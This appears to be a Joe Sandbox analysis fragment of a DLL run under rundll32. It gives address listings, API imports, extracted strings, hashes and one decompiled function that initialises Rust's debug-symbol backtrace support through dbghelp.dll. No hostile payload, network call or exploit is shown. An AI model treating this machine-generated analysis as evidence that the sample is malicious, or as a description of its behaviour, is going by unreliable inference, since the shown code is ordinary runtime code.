                                                                                                                                                                                      0x6e9dc7f2
                                                                                                                                                                                      0x6e9dc7f5
                                                                                                                                                                                      0x6e9dc7fc
                                                                                                                                                                                      0x6e9dc803
                                                                                                                                                                                      0x6e9dc80a
                                                                                                                                                                                      0x6e9dc811
                                                                                                                                                                                      0x6e9dc815
                                                                                                                                                                                      0x6e9dc81c
                                                                                                                                                                                      0x6e9dc823
                                                                                                                                                                                      0x6e9dc828
                                                                                                                                                                                      0x6e9dc82a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc830
                                                                                                                                                                                      0x6e9dc835
                                                                                                                                                                                      0x6e9dc83d
                                                                                                                                                                                      0x6e9dc840
                                                                                                                                                                                      0x6e9dc842
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc842
                                                                                                                                                                                      0x6e9dc77d
                                                                                                                                                                                      0x6e9dc77d
                                                                                                                                                                                      0x6e9dc785
                                                                                                                                                                                      0x6e9dc78b
                                                                                                                                                                                      0x6e9dc795
                                                                                                                                                                                      0x6e9dc79c
                                                                                                                                                                                      0x6e9dc7a3
                                                                                                                                                                                      0x6e9dc7a9
                                                                                                                                                                                      0x6e9dc7ac
                                                                                                                                                                                      0x6e9dc7af
                                                                                                                                                                                      0x6e9dc7b2
                                                                                                                                                                                      0x6e9dc7b5
                                                                                                                                                                                      0x6e9dc7ba
                                                                                                                                                                                      0x6e9dc7bd
                                                                                                                                                                                      0x6e9dc7bf
                                                                                                                                                                                      0x6e9dc8f3
                                                                                                                                                                                      0x6e9dc8f3
                                                                                                                                                                                      0x6e9dc8f6
                                                                                                                                                                                      0x6e9dc8f8
                                                                                                                                                                                      0x6e9dc9cb
                                                                                                                                                                                      0x6e9dc9d0
                                                                                                                                                                                      0x6e9dc9d3
                                                                                                                                                                                      0x6e9dc9d6
                                                                                                                                                                                      0x6e9dcbd7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbd7
                                                                                                                                                                                      0x6e9dc9dc
                                                                                                                                                                                      0x6e9dc9df
                                                                                                                                                                                      0x6e9dcbd0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbd0
                                                                                                                                                                                      0x6e9dc9e5
                                                                                                                                                                                      0x6e9dc9e7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9f0
                                                                                                                                                                                      0x6e9dc9f5
                                                                                                                                                                                      0x6e9dc9f8
                                                                                                                                                                                      0x6e9dc9fb
                                                                                                                                                                                      0x6e9dc9fd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca03
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca03
                                                                                                                                                                                      0x6e9dc8fe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc7c5
                                                                                                                                                                                      0x6e9dc7dd
                                                                                                                                                                                      0x6e9dc7e2
                                                                                                                                                                                      0x6e9dcbfe
                                                                                                                                                                                      0x6e9dcbfe
                                                                                                                                                                                      0x6e9dcc00
                                                                                                                                                                                      0x6e9dcc00
                                                                                                                                                                                      0x6e9dcc05
                                                                                                                                                                                      0x6e9dc933
                                                                                                                                                                                      0x6e9dc933
                                                                                                                                                                                      0x6e9dc936
                                                                                                                                                                                      0x6e9dc939
                                                                                                                                                                                      0x6e9dc940
                                                                                                                                                                                      0x6e9dc942
                                                                                                                                                                                      0x6e9dc947
                                                                                                                                                                                      0x6e9dc947
                                                                                                                                                                                      0x6e9dc94d
                                                                                                                                                                                      0x6e9dc956
                                                                                                                                                                                      0x6e9dca33
                                                                                                                                                                                      0x6e9dca33
                                                                                                                                                                                      0x6e9dca38
                                                                                                                                                                                      0x6e9dca3a
                                                                                                                                                                                      0x6e9dca3c
                                                                                                                                                                                      0x6e9dca41
                                                                                                                                                                                      0x6e9dca41
                                                                                                                                                                                      0x6e9dca47
                                                                                                                                                                                      0x6e9dca4d
                                                                                                                                                                                      0x6e9dca4f
                                                                                                                                                                                      0x6e9dcc0f
                                                                                                                                                                                      0x6e9dcc14
                                                                                                                                                                                      0x6e9dcc16
                                                                                                                                                                                      0x6e9dcc26
                                                                                                                                                                                      0x6e9dcc2b
                                                                                                                                                                                      0x6e9dcc30
                                                                                                                                                                                      0x6e9dcc32
                                                                                                                                                                                      0x6e9dcc72
                                                                                                                                                                                      0x6e9dcc78
                                                                                                                                                                                      0x6e9dcc7f
                                                                                                                                                                                      0x6e9dcc81
                                                                                                                                                                                      0x6e9dcc86
                                                                                                                                                                                      0x6e9dcc88
                                                                                                                                                                                      0x6e9dcc8f
                                                                                                                                                                                      0x6e9dcc92
                                                                                                                                                                                      0x6e9dcc97
                                                                                                                                                                                      0x6e9dcc97
                                                                                                                                                                                      0x6e9dcc9c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc9c
                                                                                                                                                                                      0x6e9dcc34
                                                                                                                                                                                      0x6e9dcc3e
                                                                                                                                                                                      0x6e9dcc43
                                                                                                                                                                                      0x6e9dcc45
                                                                                                                                                                                      0x6e9dcc45
                                                                                                                                                                                      0x6e9dcc48
                                                                                                                                                                                      0x6e9dcc4b
                                                                                                                                                                                      0x6e9dcc4e
                                                                                                                                                                                      0x6e9dccf8
                                                                                                                                                                                      0x6e9dccfe
                                                                                                                                                                                      0x6e9dcd09
                                                                                                                                                                                      0x6e9dcd09
                                                                                                                                                                                      0x6e9dcd0e
                                                                                                                                                                                      0x6e9dcd0e
                                                                                                                                                                                      0x6e9dcd10
                                                                                                                                                                                      0x6e9dcd10
                                                                                                                                                                                      0x6e9dcd12
                                                                                                                                                                                      0x6e9dcd1d
                                                                                                                                                                                      0x6e9dcd1d
                                                                                                                                                                                      0x6e9dcd22
                                                                                                                                                                                      0x6e9dcd22
                                                                                                                                                                                      0x6e9dcd2d
                                                                                                                                                                                      0x6e9dcd35
                                                                                                                                                                                      0x6e9dcd38
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dcd3b
                                                                                                                                                                                      0x6e9dc901
                                                                                                                                                                                      0x6e9dc901
                                                                                                                                                                                      0x6e9dc907
                                                                                                                                                                                      0x6e9dc90a
                                                                                                                                                                                      0x6e9dc90a
                                                                                                                                                                                      0x6e9dc910
                                                                                                                                                                                      0x6e9dc913
                                                                                                                                                                                      0x6e9dc915
                                                                                                                                                                                      0x6e9dc923
                                                                                                                                                                                      0x6e9dc923
                                                                                                                                                                                      0x6e9dc925
                                                                                                                                                                                      0x6e9dca0d
                                                                                                                                                                                      0x6e9dca10
                                                                                                                                                                                      0x6e9dca1e
                                                                                                                                                                                      0x6e9dca20
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca26
                                                                                                                                                                                      0x6e9dca29
                                                                                                                                                                                      0x6e9dca2b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca2b
                                                                                                                                                                                      0x6e9dc92b
                                                                                                                                                                                      0x6e9dc92e
                                                                                                                                                                                      0x6e9dc930
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc930
                                                                                                                                                                                      0x6e9dcd00
                                                                                                                                                                                      0x6e9dcd02
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcd02
                                                                                                                                                                                      0x6e9dcc54
                                                                                                                                                                                      0x6e9dcc57
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc5d
                                                                                                                                                                                      0x6e9dcc60
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc66
                                                                                                                                                                                      0x6e9dcc68
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc68
                                                                                                                                                                                      0x6e9dcc18
                                                                                                                                                                                      0x6e9dcc1d
                                                                                                                                                                                      0x6e9dcc1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc21
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca55
                                                                                                                                                                                      0x6e9dca55
                                                                                                                                                                                      0x6e9dca57
                                                                                                                                                                                      0x6e9dca5a
                                                                                                                                                                                      0x6e9dcca2
                                                                                                                                                                                      0x6e9dcca2
                                                                                                                                                                                      0x6e9dcca5
                                                                                                                                                                                      0x6e9dcca8
                                                                                                                                                                                      0x6e9dcca8
                                                                                                                                                                                      0x6e9dccab
                                                                                                                                                                                      0x6e9dccb1
                                                                                                                                                                                      0x6e9dccb8
                                                                                                                                                                                      0x6e9dccbf
                                                                                                                                                                                      0x6e9dccc5
                                                                                                                                                                                      0x6e9dccc7
                                                                                                                                                                                      0x6e9dcccd
                                                                                                                                                                                      0x6e9dccd0
                                                                                                                                                                                      0x6e9dccd6
                                                                                                                                                                                      0x6e9dccd6
                                                                                                                                                                                      0x6e9dccd0
                                                                                                                                                                                      0x6e9dccc7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dccbf
                                                                                                                                                                                      0x6e9dca60
                                                                                                                                                                                      0x6e9dca67
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca6e
                                                                                                                                                                                      0x6e9dc95c
                                                                                                                                                                                      0x6e9dc95f
                                                                                                                                                                                      0x6e9dc961
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc967
                                                                                                                                                                                      0x6e9dc96a
                                                                                                                                                                                      0x6e9dc96d
                                                                                                                                                                                      0x6e9dcbf6
                                                                                                                                                                                      0x6e9dcbfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbfb
                                                                                                                                                                                      0x6e9dc973
                                                                                                                                                                                      0x6e9dc979
                                                                                                                                                                                      0x6e9dc97e
                                                                                                                                                                                      0x6e9dc980
                                                                                                                                                                                      0x6e9dc983
                                                                                                                                                                                      0x6e9dc98a
                                                                                                                                                                                      0x6e9dc98f
                                                                                                                                                                                      0x6e9dc992
                                                                                                                                                                                      0x6e9dc994
                                                                                                                                                                                      0x6e9dc997
                                                                                                                                                                                      0x6e9dc999
                                                                                                                                                                                      0x6e9dc99b
                                                                                                                                                                                      0x6e9dc99e
                                                                                                                                                                                      0x6e9dc9a0
                                                                                                                                                                                      0x6e9dc9a3
                                                                                                                                                                                      0x6e9dc9a3
                                                                                                                                                                                      0x6e9dc99e
                                                                                                                                                                                      0x6e9dc9a8
                                                                                                                                                                                      0x6e9dc9a8
                                                                                                                                                                                      0x6e9dc9ab
                                                                                                                                                                                      0x6e9dc9ae
                                                                                                                                                                                      0x6e9dc8ef
                                                                                                                                                                                      0x6e9dc8ef
                                                                                                                                                                                      0x6e9dc8f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9b4
                                                                                                                                                                                      0x6e9dc9b4
                                                                                                                                                                                      0x6e9dc9b8
                                                                                                                                                                                      0x6e9dc9bb
                                                                                                                                                                                      0x6e9dc9be
                                                                                                                                                                                      0x6e9dcce0
                                                                                                                                                                                      0x6e9dcce6
                                                                                                                                                                                      0x6e9dcce8
                                                                                                                                                                                      0x6e9dcceb
                                                                                                                                                                                      0x6e9dcea2
                                                                                                                                                                                      0x6e9dcea2
                                                                                                                                                                                      0x6e9dcea7
                                                                                                                                                                                      0x6e9dcea8
                                                                                                                                                                                      0x6e9dcea8
                                                                                                                                                                                      0x6e9dca70
                                                                                                                                                                                      0x6e9dca77
                                                                                                                                                                                      0x6e9dca7e
                                                                                                                                                                                      0x6e9dca85
                                                                                                                                                                                      0x6e9dca8c
                                                                                                                                                                                      0x6e9dca90
                                                                                                                                                                                      0x6e9dca97
                                                                                                                                                                                      0x6e9dca9e
                                                                                                                                                                                      0x6e9dcaa5
                                                                                                                                                                                      0x6e9dcaad
                                                                                                                                                                                      0x6e9dcab0
                                                                                                                                                                                      0x6e9dcab6
                                                                                                                                                                                      0x6e9dcab9
                                                                                                                                                                                      0x6e9dcabf
                                                                                                                                                                                      0x6e9dcac5
                                                                                                                                                                                      0x6e9dcacc
                                                                                                                                                                                      0x6e9dcad5
                                                                                                                                                                                      0x6e9dcadc
                                                                                                                                                                                      0x6e9dcae2
                                                                                                                                                                                      0x6e9dcae9
                                                                                                                                                                                      0x6e9dcaec
                                                                                                                                                                                      0x6e9dcafa
                                                                                                                                                                                      0x6e9dcb01
                                                                                                                                                                                      0x6e9dcb09
                                                                                                                                                                                      0x6e9dcb0c
                                                                                                                                                                                      0x6e9dcb0e
                                                                                                                                                                                      0x6e9dcb11
                                                                                                                                                                                      0x6e9dcb14
                                                                                                                                                                                      0x6e9dcb1b
                                                                                                                                                                                      0x6e9dcb1d
                                                                                                                                                                                      0x6e9dcb23
                                                                                                                                                                                      0x6e9dcb25
                                                                                                                                                                                      0x6e9dcb25
                                                                                                                                                                                      0x6e9dcb31
                                                                                                                                                                                      0x6e9dcb31
                                                                                                                                                                                      0x6e9dcb3f
                                                                                                                                                                                      0x6e9dcb3f
                                                                                                                                                                                      0x6e9dcb44
                                                                                                                                                                                      0x6e9dcb55
                                                                                                                                                                                      0x6e9dcb5a
                                                                                                                                                                                      0x6e9dcd4b
                                                                                                                                                                                      0x6e9dcd5a
                                                                                                                                                                                      0x6e9dcd61
                                                                                                                                                                                      0x6e9dcd68
                                                                                                                                                                                      0x6e9dcd72
                                                                                                                                                                                      0x6e9dcd75
                                                                                                                                                                                      0x6e9dcd7c
                                                                                                                                                                                      0x6e9dcd83
                                                                                                                                                                                      0x6e9dcd89
                                                                                                                                                                                      0x6e9dcd90
                                                                                                                                                                                      0x6e9dcd93
                                                                                                                                                                                      0x6e9dcd9a
                                                                                                                                                                                      0x6e9dcd9f
                                                                                                                                                                                      0x6e9dcda8
                                                                                                                                                                                      0x6e9dcdae
                                                                                                                                                                                      0x6e9dcdb1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcdb8
                                                                                                                                                                                      0x6e9dcdc0
                                                                                                                                                                                      0x6e9dcdc3
                                                                                                                                                                                      0x6e9dcdc5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcb60
                                                                                                                                                                                      0x6e9dcb63
                                                                                                                                                                                      0x6e9dce00
                                                                                                                                                                                      0x6e9dce03
                                                                                                                                                                                      0x6e9dce05
                                                                                                                                                                                      0x6e9dce07
                                                                                                                                                                                      0x6e9dce0a
                                                                                                                                                                                      0x6e9dce0f
                                                                                                                                                                                      0x6e9dce0f
                                                                                                                                                                                      0x6e9dce0a
                                                                                                                                                                                      0x6e9dce17
                                                                                                                                                                                      0x6e9dce1d
                                                                                                                                                                                      0x6e9dce23
                                                                                                                                                                                      0x6e9dce25
                                                                                                                                                                                      0x6e9dce27
                                                                                                                                                                                      0x6e9dce2a
                                                                                                                                                                                      0x6e9dce2f
                                                                                                                                                                                      0x6e9dce2f
                                                                                                                                                                                      0x6e9dce2a
                                                                                                                                                                                      0x6e9dce39
                                                                                                                                                                                      0x6e9dce3f
                                                                                                                                                                                      0x6e9dce43
                                                                                                                                                                                      0x6e9dce4a
                                                                                                                                                                                      0x6e9dce52
                                                                                                                                                                                      0x6e9dce59
                                                                                                                                                                                      0x6e9dce60
                                                                                                                                                                                      0x6e9dce67
                                                                                                                                                                                      0x6e9dce6e
                                                                                                                                                                                      0x6e9dce72
                                                                                                                                                                                      0x6e9dce79
                                                                                                                                                                                      0x6e9dce80
                                                                                                                                                                                      0x6e9dce88
                                                                                                                                                                                      0x6e9dce8b
                                                                                                                                                                                      0x6e9dce8e
                                                                                                                                                                                      0x6e9dce93
                                                                                                                                                                                      0x6e9dce95
                                                                                                                                                                                      0x6e9dce95
                                                                                                                                                                                      0x6e9dce97
                                                                                                                                                                                      0x6e9dce9b
                                                                                                                                                                                      0x6e9dcea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcea0
                                                                                                                                                                                      0x6e9dcb6b
                                                                                                                                                                                      0x6e9dcb71
                                                                                                                                                                                      0x6e9dcb73
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcb7c
                                                                                                                                                                                      0x6e9dcb7f
                                                                                                                                                                                      0x6e9dcb86
                                                                                                                                                                                      0x6e9dcb8d
                                                                                                                                                                                      0x6e9dcb94
                                                                                                                                                                                      0x6e9dcb9b
                                                                                                                                                                                      0x6e9dcba2
                                                                                                                                                                                      0x6e9dcbb0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbbb
                                                                                                                                                                                      0x6e9dcbbe
                                                                                                                                                                                      0x6e9dcbc6
                                                                                                                                                                                      0x6e9dcbc8
                                                                                                                                                                                      0x6e9dcdc8
                                                                                                                                                                                      0x6e9dcdcb
                                                                                                                                                                                      0x6e9dcdd2
                                                                                                                                                                                      0x6e9dcddb
                                                                                                                                                                                      0x6e9dcddd
                                                                                                                                                                                      0x6e9dcddf
                                                                                                                                                                                      0x6e9dcddf
                                                                                                                                                                                      0x6e9dcdeb
                                                                                                                                                                                      0x6e9dcdeb
                                                                                                                                                                                      0x6e9dcdfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcdfb
                                                                                                                                                                                      0x6e9dcb5a
                                                                                                                                                                                      0x6e9dccf1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dccf1
                                                                                                                                                                                      0x6e9dc9c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9c4
                                                                                                                                                                                      0x6e9dc9ae
                                                                                                                                                                                      0x6e9dc956
                                                                                                                                                                                      0x6e9dc7bf

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9DD000: TlsGetValue.KERNEL32(00000000,00000001,6E9DC746), ref: 6E9DD00B
                                                                                                                                                                                        • Part of subcall function 6E9DD000: TlsGetValue.KERNEL32(00000000), ref: 6E9DD043
                                                                                                                                                                                      • AcquireSRWLockShared.KERNEL32(6EA2E11C), ref: 6E9DC785
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DC8DC
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DC8EA
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DC94D
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DCA47
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DCB31
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DCB3F
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9DCC18
                                                                                                                                                                                      • HeapAlloc.KERNEL32(02A40000,00000000,00000010), ref: 6E9DCC2B
                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,00000000,02A40000,00000000,00000010), ref: 6E9DCC9C
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,02A40000,00000000,00000010), ref: 6E9DCD1D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd, xrefs: 6E9DCBE1
                                                                                                                                                                                      • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E9DCC00
                                                                                                                                                                                      • full, xrefs: 6E9DCCF8
                                                                                                                                                                                      • cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6E9DC74D, 6E9DC7C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$FreeValue$AcquireAllocLockProcessShared
                                                                                                                                                                                      • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd$cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa$full
                                                                                                                                                                                      • API String ID: 2275035175-262129955
                                                                                                                                                                                      • Opcode ID: d1da2affb12e313f3984f3019ae5193f63be601d997904b2bc135ae23cb3972b
                                                                                                                                                                                      • Instruction ID: e24f3c7e771635f2593ad975b90b0fae3d25526f399ea203238f321a184431b5
                                                                                                                                                                                      • Opcode Fuzzy Hash: d1da2affb12e313f3984f3019ae5193f63be601d997904b2bc135ae23cb3972b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 671256B4A04A298FEB11CFE4C954B9EBBB9BF49304F208529D415BF240D775E84ACF94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                                                      			E6E9DE4E0(void* __ebx, void* __edi, void* __esi, char _a8) {
                                                                                                                                                                                      				int _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                      				struct HINSTANCE__* _t20;
                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                      				_Unknown_base(*)()* _t25;
                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                      				_Unknown_base(*)()* _t30;
                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                      				_Unknown_base(*)()* _t38;
                                                                                                                                                                                      				_Unknown_base(*)()* _t39;
                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                      				_Unknown_base(*)()* _t52;
                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t48 = __edi;
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_v32 = _t59 - 0x14;
                                                                                                                                                                                      				_v20 = 0xffffffff;
                                                                                                                                                                                      				_v24 = E6E9E39F0;
                                                                                                                                                                                      				_v28 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v28;
                                                                                                                                                                                      				_t35 =  *0x6ea2e124; // 0x0
                                                                                                                                                                                      				if(_t35 == 0) {
                                                                                                                                                                                      					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
                                                                                                                                                                                      					__eflags = _t15;
                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                      						_t54 = 1;
                                                                                                                                                                                      						goto L19;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t35 = _t15;
                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                      						asm("lock cmpxchg [0x6ea2e124], ebx");
                                                                                                                                                                                      						if(0 != 0) {
                                                                                                                                                                                      							CloseHandle(_t35);
                                                                                                                                                                                      							_t35 = 0;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
                                                                                                                                                                                      					_t20 =  *0x6ea2e130; // 0x0
                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                      						L3:
                                                                                                                                                                                      						_t54 = 0;
                                                                                                                                                                                      						if( *0x6ea2e164 != 0) {
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t38 =  *0x6ea2e134; // 0x0
                                                                                                                                                                                      							if(_t38 != 0) {
                                                                                                                                                                                      								L7:
                                                                                                                                                                                      								_t21 =  *_t38();
                                                                                                                                                                                      								_t39 =  *0x6ea2e138; // 0x0
                                                                                                                                                                                      								_t50 = _t21;
                                                                                                                                                                                      								if(_t39 != 0) {
                                                                                                                                                                                      									L10:
                                                                                                                                                                                      									 *_t39(_t50 | 0x00000004);
                                                                                                                                                                                      									_t52 =  *0x6ea2e13c; // 0x0
                                                                                                                                                                                      									if(_t52 != 0) {
                                                                                                                                                                                      										L13:
                                                                                                                                                                                      										_t23 = GetCurrentProcess();
                                                                                                                                                                                      										 *_t52(_t23, 0, 1);
                                                                                                                                                                                      										 *0x6ea2e164 = 1;
                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t25 = GetProcAddress( *0x6ea2e130, "SymInitializeW");
                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                      											_v36 = _t35;
                                                                                                                                                                                      											_v20 = 0;
                                                                                                                                                                                      											E6E9F94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ea204bc);
                                                                                                                                                                                      											goto L23;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t52 = _t25;
                                                                                                                                                                                      											 *0x6ea2e13c = _t25;
                                                                                                                                                                                      											goto L13;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t28 = GetProcAddress( *0x6ea2e130, "SymSetOptions");
                                                                                                                                                                                      									if(_t28 == 0) {
                                                                                                                                                                                      										_v36 = _t35;
                                                                                                                                                                                      										_v20 = 0;
                                                                                                                                                                                      										E6E9F94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ea204ac);
                                                                                                                                                                                      										goto L23;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t39 = _t28;
                                                                                                                                                                                      										 *0x6ea2e138 = _t28;
                                                                                                                                                                                      										goto L10;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t30 = GetProcAddress(_t20, "SymGetOptions");
                                                                                                                                                                                      								if(_t30 == 0) {
                                                                                                                                                                                      									_v36 = _t35;
                                                                                                                                                                                      									_v20 = 0;
                                                                                                                                                                                      									E6E9F94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ea2049c);
                                                                                                                                                                                      									L23:
                                                                                                                                                                                      									asm("ud2");
                                                                                                                                                                                      									__eflags =  &_a8;
                                                                                                                                                                                      									return E6E9DE6D0(_v36);
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t38 = _t30;
                                                                                                                                                                                      									 *0x6ea2e134 = _t30;
                                                                                                                                                                                      									goto L7;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t20 = LoadLibraryA("dbghelp.dll");
                                                                                                                                                                                      						 *0x6ea2e130 = _t20;
                                                                                                                                                                                      						if(_t20 == 0) {
                                                                                                                                                                                      							ReleaseMutex(_t35);
                                                                                                                                                                                      							_t54 = 1;
                                                                                                                                                                                      							L19:
                                                                                                                                                                                      							 *[fs:0x0] = _v28;
                                                                                                                                                                                      							return _t54;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}






















                                                                                                                                                                                      0x6e9de4e0
                                                                                                                                                                                      0x6e9de4e4
                                                                                                                                                                                      0x6e9de4e9
                                                                                                                                                                                      0x6e9de4ec
                                                                                                                                                                                      0x6e9de4f3
                                                                                                                                                                                      0x6e9de504
                                                                                                                                                                                      0x6e9de507
                                                                                                                                                                                      0x6e9de50d
                                                                                                                                                                                      0x6e9de515
                                                                                                                                                                                      0x6e9de5f5
                                                                                                                                                                                      0x6e9de5fa
                                                                                                                                                                                      0x6e9de5fc
                                                                                                                                                                                      0x6e9de620
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5fe
                                                                                                                                                                                      0x6e9de5fe
                                                                                                                                                                                      0x6e9de600
                                                                                                                                                                                      0x6e9de602
                                                                                                                                                                                      0x6e9de60a
                                                                                                                                                                                      0x6e9de613
                                                                                                                                                                                      0x6e9de619
                                                                                                                                                                                      0x6e9de619
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de60a
                                                                                                                                                                                      0x6e9de51b
